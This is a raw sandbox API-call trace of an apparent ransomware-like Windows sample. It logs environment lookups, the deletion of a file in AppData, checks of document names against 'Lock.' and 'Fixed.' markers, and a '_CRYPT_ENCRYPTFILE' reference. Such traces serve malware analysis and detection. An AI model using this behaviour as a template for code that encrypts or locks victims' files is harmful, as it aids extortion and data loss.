1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.955] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.955] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0230.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0230.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0230.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0230.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0230.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6e) returned 0x2e564e0 [0230.956] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FDKSrtwPMRhz2PyeAx.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\FDKSrtwPMRhz2PyeAx.gif", lpFilePart=0x8cedf4*="FDKSrtwPMRhz2PyeAx.gif") returned 0x36 [0230.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0230.956] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FDKSrtwPMRhz2PyeAx.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fdksrtwpmrhz2pyeax.gif")) returned 0x20 [0230.956] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FDKSrtwPMRhz2PyeAx.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4482d20, ftCreationTime.dwHighDateTime=0x1d5ed38, ftLastAccessTime.dwLowDateTime=0xc3394820, ftLastAccessTime.dwHighDateTime=0x1d5e6c3, ftLastWriteTime.dwLowDateTime=0xc3394820, ftLastWriteTime.dwHighDateTime=0x1d5e6c3, nFileSizeHigh=0x0, nFileSizeLow=0x3baa, dwReserved0=0x1, dwReserved1=0x1c, cFileName="FDKSrtwPMRhz2PyeAx.gif", cAlternateFileName="FDKSRT~1.GIF")) returned 0xa87610 [0230.956] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FDKSrtwPMRhz2PyeAx.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fdksrtwpmrhz2pyeax.gif")) returned 1 [0230.969] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4482d20, ftCreationTime.dwHighDateTime=0x1d5ed38, ftLastAccessTime.dwLowDateTime=0xc3394820, ftLastAccessTime.dwHighDateTime=0x1d5e6c3, ftLastWriteTime.dwLowDateTime=0xc3394820, ftLastWriteTime.dwHighDateTime=0x1d5e6c3, nFileSizeHigh=0x0, nFileSizeLow=0x3baa, dwReserved0=0x1, dwReserved1=0x1c, cFileName="FDKSrtwPMRhz2PyeAx.gif", cAlternateFileName="FDKSRT~1.GIF")) returned 0 [0230.969] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0230.970] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0230.970] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6e) returned 0x2e564e0 [0230.971] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FDKSrtwPMRhz2PyeAx.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\FDKSrtwPMRhz2PyeAx.gif", lpFilePart=0x8cf650*="FDKSrtwPMRhz2PyeAx.gif") returned 0x36 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0230.971] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FDKSrtwPMRhz2PyeAx.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fdksrtwpmrhz2pyeax.gif")) returned 0xffffffff [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0230.971] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0230.971] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.971] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0230.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0230.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FpHVdISbKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pHVdISbKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HVdISbKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VdISbKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dISbKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISbKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SbKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bKXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KXY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XY46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0230.972] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0230.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0230.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0230.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977cf8 [0230.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FpHVdISbKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pHVdISbKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HVdISbKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VdISbKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dISbKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISbKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SbKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bKXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KXY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XY46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6o.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0230.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0230.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0230.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0230.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0230.980] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0230.981] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0230.981] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0230.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.982] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503e0 [0230.982] 